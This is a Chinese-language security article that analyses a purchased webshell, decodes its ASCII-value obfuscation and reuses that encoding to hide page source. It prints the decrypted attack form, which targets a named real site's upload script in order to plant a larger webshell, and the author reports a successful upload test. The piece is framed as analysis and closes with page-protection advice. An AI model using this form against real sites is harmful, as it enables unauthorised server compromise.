首页    新闻    下载    文档    论坛     最新漏洞    黑客教程    数据库    搜索    小榕软件实验室怀旧版    星际争霸WEB版    最新IP准确查询   
名称: 密码:      忘记密码  马上注册
安全知识 :: 脚本攻防

实例:对某ASC加密网马的破解和利用


http://www.gipsky.com/
QQ群中,有人在叫卖网马。网友花钱获得一个共享给我,让我看看。于是有了下面的这篇文章。

  <STRONG>1.网马初探</STRONG>

  在浏览器中打开网马,这个网马的功能比较简单,主要用来上传功能更强的网马。比较有特色的是可以在目标网页的上传漏洞,自己修改修改配置。查看该网马的源代码,发现该网马加密了,很明显是用ASC加密。(图1)



<STRONG>2.网马分析</STRONG>

  虽然该网马的核心功能代码进行ASC加密了,但其框架一目了然。其代码及其解释如下:













<STRONG>3.网马解密</STRONG>

  可以自行编写一个ASC解密工具,笔者从网上下载了别人的ASC解密代码,然后根据该网马的加密原理进行修改重新编译生成解密工具。

  运行该工具,把该网马源代码t后面的值拷贝至工具相应的文本框中点击解密,即可还原该网马的源代码。(图2)



<body>

<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return

click() enctype=multipart/form-data>

源(图片)文件:



<input name="filename" type="file" class="buttonUnActive" size="20">



目标(大马)文件:



<input name="filename1" type=file class=buttonUnActive size=20>



<input name=submit type=submit class="button" style=border"1px value=上传大马 double rgb(88.88.88);font:9pt>

<input name=imgwidth type=hidden id=imgwidth>

<input name=imgheight type=hidden id=imgheight>

<input name=aligntype type=hidden id="channelid" value="0">

<input name="channelid" type="hidden" id="channelurlid" value=0>

<input name="id" type="hidden" id="id2">



<STRONG>4.解密效果</STRONG>

  拷贝解密后的html代码保存为一test.htm文件,在浏览器中打开,进行上传测试成功,说明对该网马的ASC解密成功。(图3)



<STRONG>5.加密利用</STRONG>

  在破解了该网马的ASC加密之后,我们利用该网马的加密原理对我们的网页进行加密,达到保护网页代码的效果。ASC加密主要用来保护静态页面代码,动态代码由于在服务器端,客户端显示的只是运行结果。“IT专家网”的页面是动态生成的,作为演示就以它为例进行。

  查看并拷贝网页代码,通过“ASCCII速查器”把字符转换成ASC值。然后把生成的ASC值拷贝到我们破解的网马代码中作为t的值。这样可以别人就不能看到网页源代码,看到的只是其的ASC值,对网页代码起到了一定的保护作用,运行效果和加密前完全一样。(图4)



<STRONG>总结</STRONG>:ASC加密是当前静态网页加密的主要形式,从上面笔者对某网马的解密看,这种加密形式并不能从根本上保证网页代码的安全。基于笔者及其朋友网站维护的经验,推荐几种网页加密方法:

  1.脚本加密,通过类似VB、JAVA这样脚本代码实现:封锁鼠标右键、禁止查看源文件、链接调用地址加密等功能。

  2.IIS的密码,通过对IIS的安全、验证等部署,防止非授权的访问。

  3.ASP程序加密,使用ASP程序来给网页进行加密,现在大多数网站都使用ASP程序,它对Web服务器没有具体要求,而其加密就是借助数据库及ASP程序进行设计,来实现一种通用网页加密。

  4.软件加密,现在给网页加密的软件非常多,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去点击“加密”按钮就可以了。
<< flash漏洞所用shellcode的分析 国内资深黑客浅谈恶意代码的研究分析 >>
API:
gipsky.com& 安信网络
网友个人意见,不代表本站立场。对于发言内容,由发表者自负责任。

系统导航

 

Copyright © 2001-2010 安信网络. All Rights Reserved
京ICP备14013333号-8